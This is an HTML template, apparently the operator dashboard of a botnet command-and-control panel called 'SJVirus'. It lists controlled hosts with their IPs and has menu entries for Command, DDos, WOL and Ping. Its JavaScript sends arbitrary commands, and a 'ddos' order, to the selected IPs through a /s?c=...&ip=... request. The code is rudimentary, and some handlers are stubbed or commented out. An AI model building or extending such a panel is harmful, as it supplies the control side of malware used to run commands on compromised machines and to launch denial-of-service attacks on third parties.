<!DOCTYPE html>
<html lang="ko">

<head>
  <link rel = "stylesheet" href="/Web_Project/static/style.css" type = "text/css"
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Admin Page</title>
  
</head>

<body>
  <header>
    <h1>SJVirus</h1>
    
    <h2>
      <div class="scrollBar">
        {% for row in data %}
          <p onclick="addIP('{{row[2]}}')">
            [ {{row[0]}} ] {{row[1]}} : {{row[2]}} : {{row[3]}} : [ {{row[5]}} ] [ {{row[4]}} ]
          </p>
        {% endfor %}
      </div>
    </h2>

    <ul>
      <li onclick="cmdPing()">Admin</li>
      <li onclick="cmdPing()">Command</li>
      <li onclick="cmdPing()">DDos</li>
      <li onclick="cmdPing()">WOL</li>
      <li onclick="cmdPing()">Ping</li>
    </ul>

    <div position="fixed" style="bottom:0px; left:100px; width:100%;">
      <input id="input" type="text" placeholder="Input Your Command">
      <button id="button" onclick="sendCommand();">&gt</button>
    </div>
  </header>
<script>
    var ipList = [];
    function addIP(ip){
      if(!ipList.includes(ip)){
        ipList.unshift(ip);
      }else{
        ipList.pop(ipList.indexOf(ip));
      }
      console.log(ipList);
    }

    function sendCommand(){
      var cmd = document.getElementById("input").value;
      location.href="/s?c="+cmd+"&ip="+ipList.join(';');
    }

  function cmdAdmin(){
    //location.href="/s?c=&ip="+ipList.join(';');
  }

  function cmdDos(){
    location.href="/s?c=ddos&ip="+ipList.join(';');
  }

  function cmdPing(){
    //location.href="/s?c=ping&ip="+ipList.join(';');
    document.getElementById("input").value='ping';
  }
  </script>
  
</body>
</html>